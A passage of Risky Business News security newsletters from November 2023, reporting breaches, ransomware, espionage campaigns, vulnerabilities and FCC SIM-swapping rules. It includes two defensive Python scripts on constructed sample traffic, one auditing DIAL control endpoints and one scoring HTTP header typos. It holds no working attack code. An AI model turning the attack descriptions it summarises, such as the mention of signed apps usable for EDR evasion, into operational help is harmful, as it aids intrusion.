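playback commands are sent to. This helper checks captured responses only.
"""
import ipaddress
from typing import Dict, Optional
from urllib.parse import urlparse

DIAL_ST = "urn:dial-multiscreen-org:service:dial:1"

# Address ranges DIAL is meant to operate on: RFC 1918, link-local, loopback.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]


def parse_headers(raw: str) -> Dict[str, str]:
    """Parse an SSDP/HTTP header block into a dict keyed by lower-cased names.

    The status line is skipped; parsing stops at the first blank line.
    """
    headers: Dict[str, str] = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break  # end of the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def dial_location(ssdp_response: str) -> Optional[str]:
    """Return the LOCATION URL if the SSDP response advertises DIAL, else None."""
    headers = parse_headers(ssdp_response)
    if headers.get("st", "").lower() != DIAL_ST:
        return None
    return headers.get("location")


def application_url(description_response: str) -> Optional[str]:
    """Extract the Application-URL header from a device-description response."""
    return parse_headers(description_response).get("application-url")


def classify_host(url: str) -> str:
    """Say whether a URL's host is on a local subnet, elsewhere, or unresolved."""
    host = urlparse(url).hostname
    if host is None:
        return "invalid"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # would need DNS resolution before it can be judged
    return "local" if any(ip in net for net in LOCAL_NETS) else "non-local"


def audit(ssdp_response: str, description_response: str) -> Dict[str, object]:
    """Combine both responses into one finding for a single advertised device."""
    location = dial_location(ssdp_response)
    if location is None:
        return {"dial": False, "location": None, "application_url": None, "scope": "not-dial"}
    app_url = application_url(description_response)
    if app_url is None:
        # The device answered as DIAL but the description carries no control endpoint.
        return {"dial": True, "location": location, "application_url": None,
                "scope": "missing-application-url"}
    return {"dial": True, "location": location, "application_url": app_url,
            "scope": classify_host(app_url)}


# Constructed sample traffic (not captured from any real device).
SAMPLE_SSDP = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "EXT:\r\n"
    "LOCATION: http://192.168.1.20:8060/dd.xml\r\n"
    "SERVER: Linux/3.10 UPnP/1.0 DIAL/1.7\r\n"
    "ST: urn:dial-multiscreen-org:service:dial:1\r\n"
    "USN: uuid:constructed-example::urn:dial-multiscreen-org:service:dial:1\r\n"
    "\r\n"
)
SAMPLE_DESCRIPTION = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/xml\r\n"
    "Application-URL: http://192.168.1.20:8060/apps/\r\n"
    "\r\n"
    "<?xml version=\"1.0\"?><root xmlns=\"urn:schemas-upnp-org:device-1-0\"></root>"
)

if __name__ == "__main__":
    print(audit(SAMPLE_SSDP, SAMPLE_DESCRIPTION))
```

A "non-local" result for a device description fetched from a LAN address is exactly the kind of mismatch worth following up, since it means the advertised control endpoint is not confined to the subnet the protocol assumes.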

Screenshot of one of the DIALStranger demos

Çadirci says that Netflix updated the protocol in 2020 to cover some of the DIALStranger issues, while some vendors either moved away from DIAL or slowly released firmware updates or new devices with a better version of the protocol.

The researcher didn't provide a full list of vulnerable devices, but his PoCs successfully exploited an Xbox One console and smart TVs from Philips, LG, Vestel, and Samsung.

A scanning script is available for further testing.

The vulnerability's name comes from Çadirci's previous work on CallStranger, a vulnerability in the UPnP protocol that could be abused to bypass security features on IoT devices and abuse them for DDoS attacks.

Obviously, DIALStranger is not an internet-breaking flaw, but anything that can be used for mass-rickrolling is a DEFCON 1 threat level to me.


Breaches, hacks, and security incidents

Canadian government data breach: The Canadian government says that cybersecurity breaches at two of its contractors have exposed the information of government employees. The breaches took place in mid-October and impacted Brookfield Global Relocation Services and SIRVA Worldwide Relocation & Moving Services, two companies that provide relocation services for government employees. Affected individuals include RCMP police forces, military staff, and public servants, going as far back as 1999. The LockBit ransomware gang already took credit for the BGRS attack.

Long Beach cyberattack: The city of Long Beach in California has shut down its IT systems after it suffered a cybersecurity incident on Tuesday. Officials say the incident did not impact public city services.

Postmeds breach: Postmeds, the company behind the Truepill pharmacy prescription fulfilling service, has disclosed a security breach. The data of more than 2.3 million Americans is believed to have been impacted. [Additional coverage in TechCrunch]

dYdX cyber-heist: A threat actor exploited the dYdX cryptocurrency platform to steal $9 million worth of crypto-assets from the company's wallets. A member of the dYdX team described the incident as a price manipulation attack.

Kronos Research cyber-heist: A threat actor stole almost $26 million worth of crypto assets from the Kronos Research trading platform. The Taiwanese company says the hack took place after the attacker gained access to some of its platform's API keys. Kronos says the hack will not jeopardize its operations, and the stolen funds only represent a small portion of its assets. [Additional coverage in The Block]

Poloniex (allegedly) identifies hacker: The Poloniex cryptocurrency exchange has allegedly learned the real-world identity of the hacker who breached its platform and stole $130 million earlier this month. In a message attached to a blockchain transaction, the company has given the hacker until November 25 to return all the stolen funds. The company says if the hacker doesn't comply, they will file charges with law enforcement in China, Russia, and the US. Poloniex has also offered to allow the hacker to keep $10 million as a "white hat reward" in an attempt to entice the hacker to return its funds.

General tech and privacy

iPhone RCS support: Support for the new RCS messaging standard will arrive on iPhones next year. [Additional coverage in 9to5Mac]

Chrome Mv2 phase-out: Google has resumed plans to phase out Manifest V2, the codebase on which most current Chrome extensions are running. Extension developers should look into porting their code to the new Manifest V3 API.

"We will begin disabling Manifest V2 extensions in pre-stable versions of Chrome (Dev, Canary, and Beta) as early as June 2024, in Chrome 127 and later. Users impacted by the rollout will see Manifest V2 extensions automatically disabled in their browser and will no longer be able to install Manifest V2 extensions from the Chrome Web Store. [...] We expect it will take at least a month to observe and stabilize the changes in pre-stable before expanding the rollout to stable channel Chrome, where it will also gradually roll out over time."

Ad-blocking company AdGuard, which has been one of the Mv3's biggest critics, has now toned down its criticism.

Twitter loses advertisers: More than a dozen of the world's largest advertisers have pulled their ads off Twitter after the platform's owner boosted some braindead antisemitic conspiracy theories. Companies that left Twitter include Apple, Sony, Disney, Lionsgate, Paramount, Comcast, Warner Bros, and IBM. [Additional coverage in Deadline]

Tor finances: The Tor Project has published its financial report for fiscal year 2021-2022. As in previous years, the US government still remains the project's main donor.

Government, politics, and policy

Russian internet censorship: The Russian government has granted permission to telecommunications watchdog Roskomnadzor to block access to websites that contain information about circumventing Internet censorship. The ban would primarily impact websites that provide instructions on how to use a VPN. After Russia's invasion of Ukraine, Roskomnadzor's blocklist has reached a mammoth size of 885,000 URLs. [Additional coverage in Meduza]

New acting national cyber director: The White House has appointed Drenan Dudley as the new White House acting national cyber director while nominee Harry Coker is going through his Senate confirmation process. [Additional coverage in Cyberscoop]

New CISA guide: CISA has released a security mitigation guide for organizations in the healthcare and public health sectors.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.

Cybercrime and threat intel

Marriott hacker fakes his own death: The FBI has arrested a Kentucky man for hacking two contractors for the Marriott hotel chain, stealing guest data, and then selling it on a Russian hacking forum. Jesse Kipf of Somerset, Kentucky, was detained in July and formally charged at the start of November. The hacks took place in February and June this year and were not publicly disclosed, neither by Marriott nor its contractors. The FBI says Kipf also hacked several US state death certificate registration agencies and successfully faked his own death in both Hawaii and Vermont. It remains unclear why, but Forbes believes this was an attempt to hide his tracks and throw off investigators. [Additional coverage in Forbes/non-paywall]

Securolytics COO pleads guilty: The chief operating officer of cybersecurity firm Securolytics has pleaded guilty to hacking two hospitals in order to boost his company's business. Prosecutors say Vikas Singla hacked two hospitals in the cities of Duluth and Lawrenceville, Georgia, and then immediately started advertising his own company's cybersecurity services to other nearby hospitals. Singla's hacks disrupted phone and network printer services. His hacks and advertising scheme were discovered, and Singla was detained in 2021. As part of the plea deal, Singla has agreed to pay $818,000 in restitution to the two hacked hospitals. In return, prosecutors will ask the judge for 57 months of probation. [Additional coverage in Law360 and GovInfoSecurity]

Israeli hacker-for-hire sentenced: A US judge has sentenced an Israeli private investigator to 80 months in prison for his role in organizing global hacking campaigns. Prosecutors say Aviram Azari made $4.8 million by acting as an intermediary between hacking groups and his customers. Azari organized campaigns that targeted climate change activists, and individuals and financial firms that had been a critical part of the German payment processing company Wirecard. The 80-month sentence is the halfway mark between the 100 months asked by the prosecution and the 60 months asked by Azari's legal team.

Dutch hacker helped drug traffickers: A Dutch man named Davy de Valk hacked the container management systems of the Antwerp and Rotterdam ports to help criminal cartels smuggle drugs and contraband into the EU. According to the Organized Crime and Corruption Reporting Project, de Valk provided cartels with data about the best containers for hiding contraband. He allegedly hacked the Antwerp port after bribing an employee into plugging a malware-infected USB drive into the terminal's network. His hacking spree began in 2020, and he provided crucial information that helped smugglers pick up their goods on the receiving end. De Valk's story is part of the OCCRP's Narco Files, a collection of reports on how crime groups, and drug cartels specifically, are slowly taking over the world.

Patternz profile: The Irish Council of Civil Liberties says that an Israeli company named ISA Security is selling access to Patternz, a powerful surveillance tool. The ICCL says Patternz taps into real-time bidding information from online advertising platforms to provide customers the ability to track almost anyone around the world. ISA claims Patternz has data points for five billion individuals, including information on their driving routes, children, co-workers, and approximate geo-location. The ICCL warns the data on which Patternz is built freely flows through China and Russia and poses a danger to government, intelligence, and military staff in both the EU and the US.

New npm malware: Thirteen malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

State of cloud security: Cloud security firm Datadog has published its yearly report on the state of cloud security. The main conclusions are below.

  • Long-lived cloud credentials continue to be problematic and expose cloud identities.

  • Multi-factor authentication (MFA) is not always consistently enforced for cloud users.

  • Adoption of IMDSv2 in AWS is rising, though still insufficient.

  • Use of public access blocks on storage buckets varies across cloud platforms and is more prevalent in AWS than Azure.

  • A number of cloud workloads have non-administrator permissions that still allow them to access sensitive data or escalate their privileges.

  • Many virtual machines are exposed to the internet.

Malware technical reports

SharpLoader: A new version of the SharpLoader malware is now in the wild, distributing versions of the Quasar RAT.

Serpent Stealer: ThreatMon has published a report on the new Serpent infostealer, also known as Serpent Stealer.

AlphV malvertising: An AlphV ransomware affiliate is using malicious Google ads to redirect users to enterprise apps laced with malware. Spotted by security firm eSentire, the ads target users searching for apps such as Slack, WinSCP, Advanced IP Scanner, and Cisco AnyConnect. These boobytrapped files contain a version of the Nitrogen backdoor, which the group will use to move laterally across networks and deploy its ransomware. eSentire says the campaign has been running since June. This seems to be the same campaign also spotted by Securonix and Trend Micro.

QazLocker ransomware: Acronis security researchers have published a deep dive into the new QazLocker ransomware. The blog post is the first in a series of write-ups the company plans to publish on currently active ransomware operations.

Rhysida ransomware: Fortinet researchers published an analysis of the Rhysida ransomware, which CISA and the FBI also covered in an advisory last week.

NoEscape ransomware: The same Fortinet team also looked at the NoEscape gang, a group seen recently employing DDoS attacks to pressure victims.

Phobos ransomware: Cisco Talos has published an in-depth analysis of the Phobos (aka Dharma) RaaS platform and its most active affiliate groups, one of which is an extortion group known as 8Base.

"We assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples we analyzed. We assess with moderate confidence that the Phobos ransomware is closely managed by a central authority, as there is only one private key capable of decryption for all campaigns we observed."

Sponsor Section

Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com

APTs, cyber-espionage, and info-ops

Stately Taurus: A Chinese APT group named Stately Taurus has launched an extensive cyber-espionage campaign against the Philippines government. The intrusions began in August after the Philippines announced joint navy patrols with the US and naval exercises with Australia. Palo Alto Networks says the group managed to compromise at least one government agency for five days in August.

SideCopy: ThreatMon has published a report on recent SideCopy operations that have used the AllaKore RAT for remote access.

Rattlesnake: QiAnXin has published a report on a Rattlesnake (Sidewinder) APT operation targeting South Asian countries with a Nim-based backdoor.

Gamaredon: Russian APT group Gamaredon is conducting a large-scale intelligence collection in Ukraine using a new USB worm named LitterDrifter. The worm's main purpose is to spread to as many systems as possible and then establish a connection from the newly infected host to a Gamaredon command-and-control server. In November 2021, the Ukrainian Security Service linked the Gamaredon group to the Crimean branch of the Russian Federal Security Service, also known as the FSB.

Vulnerabilities, security research, and bug bounty

Havoc C2 vulnerability: Security researcher Ali Beydoun has found a vulnerability in the Havoc C2 framework that can be used to crash C2 servers.

KEV tags on GreyNoise: The GreyNoise service now supports CISA KEV tags for easier threat hunting of actively exploited vulnerabilities, a useful feature for organizations with active threat intel teams and compliance requirements.

Splunk security updates: SIEM maker Splunk released security updates last week to fix seven vulnerabilities.

Infosec industry

New tool—.NetConfigLoader: Mr.Un1k0d3, a member of the RingZer0 CTF team, has published a list of .NET apps signed by Microsoft that can be used for EDR/AV evasion.

New tool—Porch Pirate: Security firm Mand Consulting Group has open-sourced a tool named Porch Pirate that can uncover secrets published to the Postman software development platform.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.

Risky Biz News: FCC adopts SIM-swapping and port-out protections

17 November 2023 at 00:30

This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:

The US Federal Communications Commission (FCC) has adopted new rules designed to protect US consumers from SIM-swapping attacks and port-out scams.

Under the new rules, US wireless providers are required to use "secure methods of authenticating a customer" when they request porting a SIM card to a new device (aka SIM swapping) or their phone number to a new carrier (aka port-out).

The Commission did not specify what the "secure methods" should be, and it appears the agency is leaving this up to each of the US carriers and their own internal procedures.

In addition, the FCC says wireless carriers have to immediately notify customers when a SIM swap or port-out operation has been requested.

The Commission hopes the notification will help victims spot a malicious request when it takes place and prevent attackers from gaining control of a user's phone number.

Both SIM-swapping and port-outs have been extensively and repeatedly used by a wide range of threat actors to hijack access to a user's phone number.

Threat actors typically use this temporary access to request password resets for the victim's online accounts, change passwords, gain control of the accounts, and then steal bank or cryptocurrency assets.

Individuals who fell victim to SIM-swapping and port-out attacks range from regular nobodies who lost their cryptocurrency savings to former Twitter CEO Jack Dorsey, who had his account hijacked to promote links to various crypto-scams.

SIM-swapping and port-out scams have also been widely adopted by professional cybercrime and ransomware groups, which typically use them to hijack low-level employee accounts and then pivot to internal networks.

Two of the most prolific groups to do so are Lapsus$ and Scattered Spider, both of which have used SIM-swapping and port-outs as the core element of their intrusions.

Back in February 2022, the FBI put out a public service announcement warning about the rise of SIM swapping and these exact same scenarios, and in August this year, the DHS Cyber Safety Review Board asked both the FCC and the FTC "to mandate and standardize best practices to combat SIM swapping."

The FCC's new rules were first proposed in July and have been adopted after a period of public comments. The FCC has opened the newly passed rules for new public comments to give telcos a way to "further harmonize" the requirements if they need to.


Breaches, hacks, and security incidents

NTMC leak: Bangladesh intelligence agency NTMC has left a sensitive database exposed on the internet and leaked the personal details of an unknown number of citizens. The leaked data contained more than 120 data points for each citizen, ranging from real names to Twitter IDs, criminal records, and phone call records. Discovered by Viktor Markopoulos of CloudDefense.AI, the researcher says he reported the database to Bangladesh officials, but the server was never secured. Instead, it was wiped and replaced with a ransom demand, presumably in an automated attack. [Additional coverage in Wired/non-paywall]

Ransomware gang reports victim to SEC: The AlphV ransomware gang has reported one of its victims to the US Securities and Exchange Commission for failing to report its security breach via a 10-K form. The reported company is MeridianLink, a digital lending service provider for the financial industry. MeridianLink has confirmed the incident but has not commented on AlphV's actions. [Additional coverage in DataBreaches.net]

Toyota ransomware incident: Japanese carmaker Toyota has confirmed that a ransomware group breached its financial services division and is now threatening to leak stolen documents on the dark web. The company confirmed the hack after the Medusa ransomware gang listed Toyota on its leak site, demanding a $8 million payment. The breach allegedly took place at Toyota's financial division in Germany. [Additional coverage in BleepingComputer]

General tech and privacy

ETSI open-sources TETRA code: ETSI, the organization behind the TETRA communications protocol, has decided to open-source the code behind its protocols and algorithms after researchers found a series of backdoors in its code in July this year. [Additional coverage in Zero Day]

New protestware: Researchers at DevSecOps company ReversingLabs have discovered new protestware packages on the npm portal containing messages of peace related to the conflicts in Ukraine, Israel, and the Gaza Strip. One of these is owned by Israeli DevSecOps company Snyk.

EFF complains to the FTC: The EFF has filed a complaint with the FTC asking the agency to crack down on e-commerce portals like Amazon and AliExpress. The EFF says the two companies and others are still selling Android TV set-top boxes infected with malware—even after such reports have been public for months. The EFF says it also notified CISA Director Jen Easterly of the issue since the backdoored devices represent a supply chain risk for the US consumer market.

Meta pushback: Meta is pushing back against US lawmakers who are trying to make the company protect kids on its platform. The company is now pushing for legislation that would have app store makers verify the age of kids and require parental approval for the installation of dangerous apps. I mean, Meta is not innocent here, but they're not wrong either. [Additional coverage in the Washington Post/non-paywall]

New Titan security keys: Google launched two new Titan security key models that can store up to 250 unique passkeys. The new models will replace Google's current line-up of USB-A and USB-C Titan keys. Besides USB ports, both models will also support NFC connectivity. As part of the product launch, Google says it will also be providing 100,000 of its new Titan keys to high-risk users for free. This includes campaign workers, activists, and journalists.

New Google Titan security keys, USB-C and USB-A connectors

Government, politics, and policy

ASD ACSC annual report: Australia's Cyber Security Centre has published its annual Cyber Threat Report for the year. The report covers 1,100 cyber security incidents from Australian organizations. The ACSC says that of these, 127 were extortion-related incidents, with 118 involving ransomware. The report also highlights that one in five critical vulnerabilities was exploited within 48 hours. As for nation-state activity, foreign actors focused on critical infrastructure and intelligence collection, with a special focus on the AUKUS partnership on nuclear submarines and other advanced military capabilities.

EU rejects client-side CSAM scanning: A key committee in the European Parliament has voted against the EU's plan to force internet companies to scan user communications for child sexual abuse material (CSAM). In a smashing 52-2-1 vote, the Committee on Civil Liberties, Justice, and Home Affairs ruled against the introduction of client-side scanning and age verification mechanisms.

Russia blocks Shadowsocks protocol: Russian telecommunications watchdog Roskomnadzor has ordered internet service providers to block the Shadowsocks tunneling protocol. Shadowsocks is the latest internet protocol added to the country's VPN blocklist, which the agency silently started enforcing earlier this year. It is one of the 49 protocols Russia is currently attempting to block. The full blocklist leaked online last week after the Ministry of Transport sent a document about the ban to its subordinates. Other protocols included on the list include the likes of WireGuard, OpenVPN, IPSec, and IKEv2. [Additional coverage in The Moscow Times]

Harry Coker nomination: The Senate Homeland Security and Governmental Affairs Committee advanced the nomination of Harry Coker for the role of White House National Cyber Director. Coker's nomination passed in a 9 to 6 vote. Coker is set to replace Chris Inglis, who left the post in February. [Additional coverage in The Record]

Biden campaign CISO: The Biden camp is looking for a CISO to help it safeguard the US President's re-election attempt. [Additional coverage in SecurityWeek]

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Ryan Mahoney, Product Director at Gigamon. The TLS 1.3 encryption standard makes passive network monitoring inside your network difficult without break-and-inspect contortions. But Gigamon has what they call a "precryption" solution!

Cybercrime and threat intel

Exit scam group: Blockchain investigator ZachXBT has found traces that a single threat actor has orchestrated exit scams at six different cryptocurrency projects. The group is believed to have stolen more than $16.2 million worth of crypto assets from early investors in their projects. So far, the group has been tied to rug pulls at the Lendora Protocol, Magnate, Solfire, Hash DAO, Kokomo, and Snowflake.

Phishing gang detained: Police from Czechia and Ukraine have detained members of a phishing gang believed to have stolen more than €8 million from victims. Four suspects were arrested in Czechia and six in Ukraine. According to Europol, the group operated from call centers in Ukraine and carried out vishing attacks, mainly targeting Czech victims. The group's tactics involved tricking victims into thinking they were hacked and moving funds to safe accounts controlled by the gang.

LockBit and CitrixBleed: CyFirma and security researcher Kevin Beaumont have published reports on LockBit and the group's exploitation of the CitrixBleed vulnerability.

KEV update: CISA has updated its KEV database with five new vulnerabilities that are currently being exploited in the wild. The list includes three zero-days. The first is CVE-2023-36584, a Windows zero-day patched last month. The second and third are older bugs in Sophos firewalls and Oracle Fusion servers that have recently been spotted being abused in the wild.

PyPI campaign: DevSecOps company Checkmarx has discovered a threat actor who, for the past six months, has uploaded 27 malicious packages to the PyPI repository. Checkmarx says the packages typosquatted the names of legitimate libraries in order to trick developers into accidentally installing them. The libraries contained code meant to gain reboot persistence on infected hosts and to collect and exfiltrate user data to a Discord channel.

Chang Way: Bridewell security researcher Joshua Penny has published an analysis of Chang Way Technologies, a bulletproof hosting provider operating from Hong Kong. According to Penny, the service has hosted infrastructure for the BlackByte ransomware, the 404 traffic distribution system, multiple Android bankers, and initial access brokers.

SysAid attacks: Zscaler has published its own analysis of Clop's campaign targeting SysAid servers. The campaign started last week, and it's still ongoing.

FBI yearly warning: The FBI has published its yearly alert, advising consumers to be wary of scams ahead of the holiday shopping season.

Scattered Spider: Together with CISA, the FBI also released a security advisory with TTPs used by the Scattered Spider (Starfraud, UNC3944, Scatter Swine, Muddled Libra) group in recent intrusions. These include posing as IT tech support staff, MFA prompt-bombing, SIM swapping, and deploying the AlphV ransomware on hacked networks.

Threat reports: Avast, Chainguard, WithSecure, Guidepoint, Trellix, Wiz, and Sophos have published threat reports. The most interesting conclusion is Sophos' observation that dwell times are going down, in line with what Secureworks reported last month.

Malware technical reports

Rhysida ransomware: CISA and Fortinet have published write-ups on Rhysida, a new RaaS that launched back in May and has significantly ramped up operations.

Royal ransomware: CISA has updated its analysis of the Royal ransomware and added information about the gang's potential attempt to rebrand as Blacksuit.

Elevator: Lumen's Black Lotus Labs has discovered a new Linux malware strain named Elevator. The malware abuses the Berkeley Packet Filter (eBPF) to escalate privileges to kernel access on already compromised Linux servers and secure persistent access for the attacker.

SystemBC: One eSecurity researcher Aaron Jornet has published an analysis of SystemBC (Coroxy, DroxiDat), a proxy malware bot that is also often used for initial access by other cybercrime groups. Many of these groups are ransomware gangs, such as Cuba, Darkside, Conti, Ryuk, Avaddon, BlackBasta, 8Base, Rhysida, Vice Society, Maze, Egregor, Hive, and Play.

Sponsor Demo

Brought to you by Gigamon Precryption, a visibility solution for encrypted traffic across virtual machine (VM) or container workloads. Perform advanced threat detection, investigation, and response across the hybrid cloud infrastructure. To learn more, please visit gigamon.com/precryption

APTs, cyber-espionage, and info-ops

Raccoon Security: Censys has discovered that Russian company Raccoon Security is the cybersecurity arm of NTC Vulkan, a private firm contracted by the Russian Ministry of Defense to develop offensive cyber weapons. NTC Vulkan was sanctioned by both the US and the EU.

Sandworm: Security researcher Monty has put together a list of recent Sandworm TTPs.

BlueNoroff's macOS malware: South Korean security researcher Sakai has published an analysis of a new strain of macOS malware employed by North Korean hacking group BlueNoroff.

Zimbra zero-day attacks: Google's TAG security team has published additional details about a zero-day (CVE-2023-37580) in the Zimbra email server it saw exploited in the wild in June. While Google did not make a formal attribution, TAG researchers say the first attacks used an email-stealing tool used in the past by a Chinese APT group named TEMP_Heretic. Google says that once Zimbra patched the zero-day, another threat actor named Winter Vivern also started exploiting the bug in its operations. ESET previously classified Winter Vivern as a Belarus-aligned threat actor. All in all, Google TAG says it saw the Zimbra zero-day used across four separate campaigns targeting organizations in Greece, Moldova, Tunisia, Vietnam, and Pakistan.

Vulnerabilities, security research, and bug bounty

M365 misconfigurations: The research team at Reco has reminded the world that Microsoft has still not fixed one of its major issues—that when disabling a user account for an employee who left an organization, access tokens remain active. Org admins must manually trigger the "Sign out inactive users automatically" option in their backends.

Google Workspace abuse: Bitdefender has found a way to expand access from a single machine to an organization's Google Workspace environment. The method exploits the Google Credential Provider for Windows. Google was notified but declined to release a fix.

Reptar vulnerability: Intel has released security updates for all its CPU models to fix a vulnerability that can be abused to elevate privileges and crash systems. Named Reptar (CVE-2023-23583), the bug was discovered by Google security researcher Tavis Ormandy. The researcher says exploiting the bug puts the CPU in a so-called "glitch state" where normal operational rules are suspended, and attackers can perform actions they normally couldn't.

WP Fastest Cache vulnerability: Automattic's WPScan team has discovered a severe SQL injection vulnerability in the WP Fastest Cache plugin. The vulnerability can be used to hijack unpatched websites. WP Fastest Cache is one of the most popular WordPress plugins, installed on more than one million sites.

CrushFTP unauth RCE: Converge security researchers have discovered and helped patch an unauth RCE vulnerability in the CrushFTP file-transfer software. Tracked as CVE-2023-43177, the vulnerability was patched in August. More than 10,000 CrushFTP servers are currently available online, making this a huge attack surface that can be exploited.

ActiveMQ exploitation: Security firm VulnCheck has published a new method of exploiting an Apache ActiveMQ vulnerability tracked as CVE-2023-46604. The vulnerability has been exploited in the wild since mid-October to deploy the HelloKitty and TellYouThePass ransomware on unpatched servers. The new exploitation method allows threat actors to execute attacks from memory and remain undetected by security solutions. There are currently more than 11,000 internet-facing ActiveMQ servers.

Typos research: NCC Group division Fox-IT scanned the internet for typos in server HTTP responses and found that they are quite common.

"Our research concludes that typos alone are insufficient to identify malicious servers. Nevertheless, they retain potential as part of a broader detection framework."
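As an added example (not Fox-IT's tooling), here is one way to extract the typo signal from a server's response headers and fold it into a broader score rather than treating it as a verdict on its own; the sample responses are constructed, and the known-header list, weights and scoring are assumptions.

```python
import difflib
import re

# Canonical response header names a well-behaved server emits (lower-cased).
# Assumed list for the example; extend it from your own traffic baseline.
KNOWN_HEADERS = {
    "content-type", "content-length", "server", "date", "connection",
    "cache-control", "set-cookie", "location", "content-encoding",
    "transfer-encoding", "last-modified", "etag", "expires", "vary",
    "strict-transport-security", "x-content-type-options", "x-frame-options",
    "x-xss-protection", "content-security-policy", "accept-ranges",
    "keep-alive", "x-powered-by", "www-authenticate", "pragma",
}

# Constructed sample responses (not real captures). The second carries the
# kind of misspelled header names the Fox-IT scan looked for.
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 16 Nov 2023 10:00:00 GMT\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 12\r\n"
    "X-Request-Id: abc123\r\n"
    "\r\n"
    "hello world\n"
)
SUSPECT_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Sever: Apache\r\n"
    "Conten-Type: text/html\r\n"
    "Content-Lenght: 12\r\n"
    "\r\n"
    "hello world\n"
)


def parse_response_headers(raw):
    """Split a raw HTTP/1.x response head into (status_line, [(name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def header_typos(headers, cutoff=0.85):
    """Return [(observed_name, likely_intended_name)] for header names that are
    close to, but not equal to, a known name. Unknown custom headers such as
    X-Request-Id are ignored unless they resemble a standard one."""
    typos = []
    for name, _ in headers:
        lowered = name.lower()
        if lowered in KNOWN_HEADERS:
            continue
        match = difflib.get_close_matches(lowered, KNOWN_HEADERS, n=1, cutoff=cutoff)
        if match:
            typos.append((name, match[0]))
    return typos


def score_response(raw):
    """Combine the typo count with two other weak indicators into one score.
    The weights are illustrative assumptions; the point is that typos are a
    feature to correlate with others, not a conviction by themselves."""
    status, headers = parse_response_headers(raw)
    names = {n.lower() for n, _ in headers}
    typos = header_typos(headers)
    features = {
        "typo_count": len(typos),
        # Nearly every production server sends a Date header.
        "missing_date": "date" not in names,
        # Status line that does not look like "HTTP/1.x NNN ...".
        "odd_status_line": re.match(r"HTTP/\d(\.\d)? \d{3}", status) is None,
    }
    score = (features["typo_count"]
             + int(features["missing_date"])
             + 2 * int(features["odd_status_line"]))
    return {"features": features, "typos": typos, "score": score}


if __name__ == "__main__":
    for label, raw in (("benign", BENIGN_RESPONSE), ("suspect", SUSPECT_RESPONSE)):
        print(label, score_response(raw))
```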

VMware auth bypass: VMware says its Cloud Director Appliance is vulnerable to an authentication bypass vulnerability (CVE-2023-34060). The company says it's still working on a patch and has released temporary mitigations that can be used to safeguard appliances. The vulnerability has received a severity rating of 9.8/10.

Cisco security updates: Cisco has released or updated five security advisories for various products.

WhatsApp security audit: NCC Group has audited Auditable Key Directory (AKD), a library used by Meta for WhatsApp's cryptographic algorithms.

"The review was performed remotely by 3 consultants over a two-week period with a total of 20 person-days spent. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed."

StackOverflow leaks: According to a software developer named Matan H., there are thousands of API keys and tokens that have been accidentally posted on StackOverflow. Most have probably been revoked by now, but this shows a trend with programmers who still fail to sanitize their code when asking for help online.

Infosec industry

New tool—IISHelper: PwC UK has open-sourced an IDA Pro plugin named IISHelper to aid with the analysis of native IIS modules.

Clorox CISO departs after hack: Clorox chief information security officer Amy Bogac is departing her role in the aftermath of a ransomware attack that crippled the company's operations in August this year. Bogac served as the company's CISO for two and half years before she departed at the end of last week. In SEC filings, Clorox said it expects sales to drop by $356 million as a result of the incident. [Additional coverage in Bloomberg/non-paywall]

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.

Risky Biz News: Russia hacked 22 Danish critical infrastructure companies

15 November 2023 at 00:30

This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:

Russian state-sponsored hackers have breached at least 22 Danish companies operating in the country's energy sector.

Denmark's CERT team for the critical infrastructure sector (SektorCERT) described the intrusions as the largest cyber-attack in the country's history.

In a report [Danish PDF, machine-translated English file] published over the weekend, SektorCERT tentatively attributed the attacks to Sandworm, a cyber unit inside Russia's military intelligence service GRU.

The intrusions happened throughout May and took place across multiple waves.

SektorCERT says the initial point of entry was Zyxel firewalls. The first wave of attacks exploited a vulnerability tracked as CVE-2023-28771, while the other waves used a combination of CVE-2023-33009 and CVE-2023-33010.

Zyxel released patches for the three bugs in June.

The hacked companies had to disconnect from the internet to investigate the hacks, but SektorCERT says there was no impact on their operations, and the attacks were most likely intended for reconnaissance and establishing persistence.

DR, the Danish Broadcasting Corporation, says the 22 hacked companies provide electricity and heat to around 100,000 Danes.

Ironically, the intrusions took place three days after Denmark's cybersecurity agency raised the country's cyberespionage threat level to VERY HIGH.

